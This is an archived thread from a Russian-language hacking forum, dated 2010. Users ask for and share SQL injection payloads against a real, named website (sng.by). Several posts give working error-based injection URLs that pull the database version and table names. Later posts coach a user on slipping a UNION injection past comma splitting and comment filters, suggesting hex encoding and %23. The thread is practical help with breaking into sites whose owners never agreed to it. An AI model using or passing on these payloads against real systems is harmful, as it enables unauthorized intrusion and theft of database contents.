ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.05.2010, 03:49
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
_http://sng.by/articles/1.html
можно тут че заимутить? = \
|
|
|
12.05.2010, 03:55
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Сообщение от GroM88
_http://sng.by/articles/1.html
можно тут че заимутить? = \
http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+version()),floor(rand(0)*2))+from+informatio n_schema.tables+group+by+2)a)--+.html
|
|
|
|
12.05.2010, 07:28
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
Сообщение от warlok
http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+version()),floor(rand(0)*2))+from+informatio n_schema.tables+group+by+2)a)--+.html
Помогите кто довести до ума плз)
а то я в таких скул не шарю = \ \ \ \
|
|
|
|
12.05.2010, 07:51
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Сообщение от GroM88
Помогите кто довести до ума плз)
а то я в таких скул не шарю = \ \ \ \
Всё примерно так же как и в обычной:
http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+table_name+from+information_schema.tables+limit+19,1),floor(rand(0)*2))+from+information_schema.tables +group+by+2)a)--+.html
Стандартно ищешь нужные таблицы лимитом,потом колонки итд.
|
|
|
|
12.05.2010, 08:18
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 11
Провел на форуме:
51296
Репутация:
0
|
|
проблема такая....
есть уязвимое место в параметре такого вот вида "123,345,678", который парсится в результате получается примерно такой sql
...name FROM users WHERE id != 1 AND (id='123' OR id='345' OR id='678') ...
хочу вставить юнион "123') union select 11,22,33 from users where (id='345" в запрос, но не знаю как написать sql без использования запятых, а иначе запрос дробится
И вторая проблема в том что не получается использовать символ # что бы закоментировать оставшуюся часть sql.
подскажите как сделать
|
|
|
|
12.05.2010, 08:37
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от zuzzz
проблема такая....
есть уязвимое место в параметре такого вот вида "123,345,678", который парсится в результате получается примерно такой sql
...name FROM users WHERE id != 1 AND (id='123' OR id='345' OR id='678') ...
хочу вставить юнион "123') union select 11,22,33 from users where (id='345" в запрос, но не знаю как написать sql без использования запятых, а иначе запрос дробится
И вторая проблема в том что не получается использовать символ # что бы закоментировать оставшуюся часть sql.
подскажите как сделать
AND (id='1237176' or id='12323781') union select 1,2,3,4,... etc.
# - %23 
|
|
|
|
12.05.2010, 08:51
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 11
Провел на форуме:
51296
Репутация:
0
|
|
Сообщение от Ctacok
AND (id='1237176' or id='12323781') union select 1,2,3,4,... etc.
# - %23 так не получится. Я же писал, что параметр разбивается на части по запятым.
и если отправить параметр равный "123') union select 11,22,33 from users where (id='345"
то получится такая фигня :
name FROM users WHERE id != 1 AND (id='123') union select 11' OR id='22' OR id='33 from users where (id='345') ...
т.к. присутствуют запятые
и похоже это не mysql по этому и коментарий не рабтает. Как определить какая это база?
|
|
|
|
12.05.2010, 09:12
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от zuzzz
так не получится. Я же писал, что параметр разбивается на части по запятым.
и если отправить параметр равный "123') union select 11,22,33 from users where (id='345"
то получится такая фигня :
name FROM users WHERE id != 1 AND (id='123') union select 11' OR id='22' OR id='33 from users where (id='345') ...
т.к. присутствуют запятые
и похоже это не mysql по этому и коментарий не рабтает. Как определить какая это база?
Ааа вот оно что, попробуй значит.
1234') union select 0x756e696f6e2073656c65637420312c322c332c342c352c36 2c372c38 .... %23
|
|
|
|
12.05.2010, 09:39
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 11
Провел на форуме:
51296
Репутация:
0
|
|
Сообщение от Ctacok
Ааа вот оно что, попробуй значит.
1234') union select 0x756e696f6e2073656c65637420312c322c332c342c352c36 2c372c38 .... %23
Это вроде помогает, хотя еще не понятно. но теперь хотя бы на количество столбцов ругается, а не на синтаксис. Возможно просто считает это одним столбцом.
Объясни пожалуйста что это за строка такая, и как её самому собирать.
А база похоже PostgreSQL....
|
|
|
|
12.05.2010, 12:10
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 11
Провел на форуме:
51296
Репутация:
0
|
|
Сообщение от Ctacok
Ааа вот оно что, попробуй значит.
1234') union select 0x756e696f6e2073656c65637420312c322c332c342c352c36 2c372c38 .... %23
вобщем так тоже не прокатывает. База воспринимает эту строку значение одного столбца. Может быть конечно я что то не то делаю...
Столбцов там 3, вычислил с помощью order by. (order by 3 - так работает, а так order by 4 уже нет )
Как же мне запятые спрятать?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид